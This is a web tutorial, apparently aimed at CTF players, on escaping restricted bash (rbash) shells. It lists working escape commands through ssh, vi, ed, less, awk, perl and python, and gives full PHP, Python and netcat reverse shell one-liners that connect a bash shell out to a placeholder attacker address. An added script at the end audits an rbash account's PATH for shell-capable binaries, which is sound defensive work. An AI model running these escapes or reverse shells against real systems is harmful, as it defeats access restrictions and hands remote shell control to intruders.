rbash escape | escape rbash | rbash restricted shell-escape | rbash jail break | rbash commands
What is rbash
What is an rbash shell? A restricted bash shell (rbash) is a shell that blocks many commands and special characters. Commonly restricted in rbash are commands such as ls, cd, and echo; the environment variables $SHELL, $USER, $PATH, and $ENV; and special characters such as /, >, >|, <>, >&, &>, etc.
Why rbash is implemented
- Block unwanted software from running
- Improve system security
- Block dangerous commands
- For CTF Challenges
- For Guest Users
rbash escape
How do we escape an rbash shell? There are multiple ways to escape it, using different editors, Python, and debuggers. Let's try some examples.
rbash escape through SSH
Our first method is escaping the rbash shell through SSH. Many times when playing CTFs we have an SSH username and password, but our shell is restricted with rbash. We can easily bypass this rbash shell by passing the extra argument bash --noprofile.
ssh hacknos@172.20.10.2
echo $SHELL
cd ../
We can bypass the rbash shell using the --noprofile extra parameter:
ssh hackNos@<IP-Address> -t "bash --noprofile"
cd ../
rbash escape through editors
Linux has many editors, and we can bypass rbash using these editor commands.
bypass rbash using vi editor
First, we open the vi editor, then we use the :set option to set the shell variable to the location of our bash binary. Run the commands one by one.
Run the vi command to open the vi editor; using set mode, we can bypass the restricted rbash shell.
vi
:set shell=/bin/bash
:shell
escaping rbash – ed editor
ed is another Linux editor. We can simply run ed in edit mode without selecting any file, then type the bash path.
cd /home
echo $SHELL
ed
!'/bin/bash'
pwd
escape rbash through reverse shell
We can bypass the rbash shell through different Linux reverse shells. Note: before executing the reverse shell, we need to start a netcat listener.
rbash shell bypass – php
cd /
echo $SHELL
We open two SSH connections. Our cd command is currently not working. Before executing the reverse shell command, we first start our netcat listener. In this case we are using the same machine; you can use your localhost IP for the reverse connection.
nc -lvp 4545
php -r '$sock=fsockopen("ip-address",port);exec("/bin/bash -i <&3 >&3 2>&3");'
After executing the reverse shell command, we get a reverse connection from the target machine, and we have successfully bypassed the restricted rbash shell.
echo $SHELL
cd /
pwd
rbash shell bypass – python
This is another way to bypass the rbash shell, using a Python reverse shell. Remember, before executing the reverse shell command you need to start your netcat listener.
cd /
echo $SHELL
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip-address",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
nc -lvp 4545
cd /
pwd
rbash shell bypass – netcat
cd /home
echo $SHELL
nc -lvp port-number
nc ip-address port-number -e /bin/bash
escaping through code editor
rbash escape with python
If the target system already has any Python version installed, we run these commands to bypass the rbash shell.
echo $SHELL
cd ../
python -c 'import os; os.system("/bin/bash");'
python3 -c 'import os; os.system("/bin/bash");'
Again we escape the rbash shell, this time by executing a Python command with the -c argument.
cd /home
cd ../
rbash escape Awk
cd /home
echo $SHELL
awk 'BEGIN {system("/bin/bash")}'
cd /home
cd ~
pwd
rbash escape perl
cd /
echo $SHELL
perl -e 'system("/bin/bash");'
cd /
cd /home
rbash bypass through binary file
cd /
echo $SHELL
less anyfile.txt
!'bash'
cd /
cd /home
pwd
echo $SHELL
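From the defender's side, the escapes on this page rely on the restricted account being able to run a program that can start another shell (bash, vi, ed, less, awk, perl, python, php, nc). The script below is an added example, not part of the original post, that audits the command directory of an rbash account for those programs. It assumes the account's PATH is a single directory of symlinks or copies; the directory layout in the demo is constructed.

```shell
#!/bin/sh
# Added example: audit the command directory given to an rbash account.
# Assumption: the account's PATH is one directory of symlinks or copies.

# is_escape_bin NAME: succeed if NAME is a program this page uses to leave rbash.
is_escape_bin() {
    case $1 in
        bash|vi|ed|less|awk|perl|php|nc|python|python[0-9]*) return 0 ;;
    esac
    return 1
}

# audit_rbash_path DIR: print one RISK line per dangerous entry.
# Returns 0 when DIR is clean, 1 when at least one entry was flagged.
audit_rbash_path() {
    found=0
    for entry in "$1"/*; do
        [ -e "$entry" ] || continue
        name=$(basename "$entry")
        # Resolve symlinks so a renamed link (edit -> /usr/bin/vi) is still caught.
        target=$(basename "$(readlink -f "$entry")")
        if is_escape_bin "$name" || is_escape_bin "$target"; then
            echo "RISK: $name (resolves to $target) can start an unrestricted shell"
            found=$((found + 1))
        fi
    done
    [ "$found" -eq 0 ]
}

# Constructed sample layout: empty files stand in for real binaries.
demo=$(mktemp -d)
mkdir "$demo/tools" "$demo/bin"
touch "$demo/tools/vi" "$demo/tools/ls" "$demo/bin/awk"
ln -s "$demo/tools/vi" "$demo/bin/edit"   # renamed link to vi
ln -s "$demo/tools/ls" "$demo/bin/ls"     # harmless
audit_rbash_path "$demo/bin" || echo "restricted PATH is not safe"
rm -rf "$demo"
```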